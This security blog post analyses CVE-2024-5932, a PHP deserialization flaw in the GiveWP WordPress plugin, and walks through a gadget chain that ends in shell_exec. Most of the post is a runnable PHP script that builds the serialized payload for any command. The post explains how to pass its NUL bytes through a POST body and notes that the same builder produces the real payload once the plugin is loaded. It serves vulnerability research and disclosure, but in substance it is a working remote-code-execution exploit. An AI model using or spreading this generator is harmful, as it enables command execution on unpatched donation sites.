CVE-2024-5932

date
Aug 21, 2024
slug
PHP deserialization - POP chain
status
Published
tags
PHP
WebSec
summary
1 Day - Givewp
type
Post

PHP POP Chain for Remote Code Execution in GiveWP Plugin

Vulnerable Code Overview

  1. Donation Form Processing:
      • The give_process_donation_form() function handles and processes donation form submissions.
      • Validation occurs through the give_donation_form_validate_fields() function.
      • Serialized fields are checked by give_donation_form_has_serialized_fields(); this check is the only guard between the POST data and the later unserialize call.
  2. User Title Assignment:
      • The give_get_donation_form_user() function assigns user_title from the give_title POST parameter.
  3. Donation Data Preparation:
      • The give_process_donation_form() function prepares $donation_data and sends it to the payment gateway via give_send_to_gateway().
  4. Donor Metadata Insertion:
      • The insert() method of the DonorRepository class stores donor metadata, including the prefix, which is derived from the user_title parameter.
  5. Unserialization and Vulnerability Trigger:
      • The _give_donor_title_prefix meta is unserialized in the setup_user_info() function, so attacker-controlled serialized data reaches unserialize() and any object graph it describes is instantiated.

Exploitation Steps

  • Chain: instance of Stripe\StripeObject -> __toString() (magic method) -> toArray() -> $_values['foo'] is an instance of Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData -> toArray() -> getLegacyBillingAddress() -> $userInfo['address'] is an instance of Give -> read of the address1 property -> __get() magic method -> $container is an instance of Give\Vendors\Faker\ValidGenerator -> get() -> __call() magic method -> $validator property is the string 'shell_exec' -> invoked via call_user_func($this->validator, $res)
Instance of Stripe\StripeObject:
The POP chain begins with an instance of the Stripe\StripeObject class. Once the unserialized object is used in a string context, its __toString() magic method is called, which invokes the toArray() method.
Instance of Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData:
toArray() walks $_values and calls toArray() on every value that has such a method. $_values['foo'] is set to an instance of GiveInsertPaymentData, whose toArray() in turn calls getLegacyBillingAddress().
Instance of Give:
getLegacyBillingAddress() reads $userInfo['address'], which is set to an instance of the Give class. Reading a property such as address1 on that object invokes Give's __get() magic method, which forwards the lookup to the get() method of $this->container. The $container property is attacker-controlled as well, because it is restored from the serialized data.
Instance of Give\Vendors\Faker\ValidGenerator:
$container is an instance of ValidGenerator. ValidGenerator defines no get() method, so the call lands in its __call() magic method.
Execution of shell_exec:
The $validator property of ValidGenerator is set to the string 'shell_exec'. __call() runs call_user_func($this->validator, $res), so shell_exec() is executed with the attacker-supplied $res as the command.
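The chain above, as an added example that is not code from GiveWP, stripe-php, Faker or the author of this post: a stand-alone PHP script with minimal stand-ins for the gadget classes (each keeping only the behaviour the chain relies on), which builds the payload with serialize() and fires it locally. The property visibilities (protected $_values, public $userInfo, private $container, protected $generator/$validator/$maxRetries) and the inner generator stand-in (named DefaultGenerator here, returning the command string for any method call) are assumptions to verify against the plugin version you target; a wrong visibility changes the serialized property name and silently breaks the chain.

```php
<?php
// Added example, not GiveWP / stripe-php / Faker code. Stand-ins for the gadget classes,
// reduced to the behaviour the chain needs. ASSUMED: property visibilities below and the
// DefaultGenerator stand-in; check both against the real classes before relying on them.

namespace Stripe {
    class StripeObject {
        protected $_values = [];                             // 'foo' => GiveInsertPaymentData
        public function __toString(): string {
            return static::class . ' JSON: ' . json_encode($this->toArray());
        }
        public function toArray(): array {
            $out = [];
            foreach ($this->_values as $k => $v) {
                $out[$k] = (\is_object($v) && \method_exists($v, 'toArray')) ? $v->toArray() : $v;
            }
            return $out;
        }
    }
}

namespace Give\PaymentGateways\DataTransferObjects {
    class GiveInsertPaymentData {
        public $userInfo = [];                               // 'address' => Give instance
        public function toArray(): array {
            return ['address' => $this->getLegacyBillingAddress()];
        }
        private function getLegacyBillingAddress(): array {
            $address = $this->userInfo['address'];
            return ['line1' => $address->address1];          // undefined property -> Give::__get
        }
    }
}

namespace {
    class Give {
        private $container;                                 // ValidGenerator instance (assumed private)
        public function __get($propertyName) {
            return $this->container->get($propertyName);    // no get() there -> __call
        }
    }
}

namespace Give\Vendors\Faker {
    class DefaultGenerator {                                // assumed inner generator stand-in
        protected $default;
        public function __call($method, $args) { return $this->default; }
    }
    class ValidGenerator {
        protected $generator;
        protected $validator;                               // the string 'shell_exec'
        protected $maxRetries = 10000;
        public function __call($name, $arguments) {
            $i = 0;
            do {
                $res = \call_user_func_array([$this->generator, $name], $arguments);
                if (++$i > $this->maxRetries) {
                    throw new \OverflowException('validator never accepted a value');
                }
            } while (!\call_user_func($this->validator, $res));   // shell_exec($command)
            return $res;
        }
    }
}

namespace {
    function set_prop(object $obj, string $name, $value): void {
        $prop = new \ReflectionProperty($obj, $name);
        $prop->setAccessible(true);                          // no-op on PHP >= 8.1
        $prop->setValue($obj, $value);
    }

    function build_payload(string $command): string {
        $inner = new Give\Vendors\Faker\DefaultGenerator();
        set_prop($inner, 'default', $command);
        $valid = new Give\Vendors\Faker\ValidGenerator();
        set_prop($valid, 'generator', $inner);
        set_prop($valid, 'validator', 'shell_exec');
        $give = new Give();
        set_prop($give, 'container', $valid);
        $dto = new Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData();
        $dto->userInfo = ['address' => $give];
        $root = new Stripe\StripeObject();
        set_prop($root, '_values', ['foo' => $dto]);
        return serialize($root);
    }

    // The command must print something: shell_exec() returns null for a silent command,
    // the do/while above treats null as "rejected" and re-runs the command up to maxRetries.
    $marker  = sys_get_temp_dir() . '/givewp-pop-chain-fired';
    $payload = build_payload('echo fired | tee ' . escapeshellarg($marker));

    // Protected/private property names carry NUL bytes; they are shown escaped here and
    // must survive transport unchanged (e.g. %00 in a URL-encoded POST body).
    echo str_replace("\0", '\0', $payload), "\n";

    // Simulate the sink: the stored meta is unserialize()d and later used as a string.
    $object   = unserialize($payload);
    $asString = (string) $object;    // __toString -> toArray -> __get -> __call -> shell_exec
    var_dump(file_exists($marker));  // bool(true) once the chain has fired
}
```

Run it with `php pop_chain.php`: it prints the serialized payload and `bool(true)`. Generating the payload against stubs is only valid while the stubs' property visibilities match the real classes; with the real plugin loaded, the same build_payload() would produce the payload by serializing the genuine objects instead.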

© Amine Elsassi 2024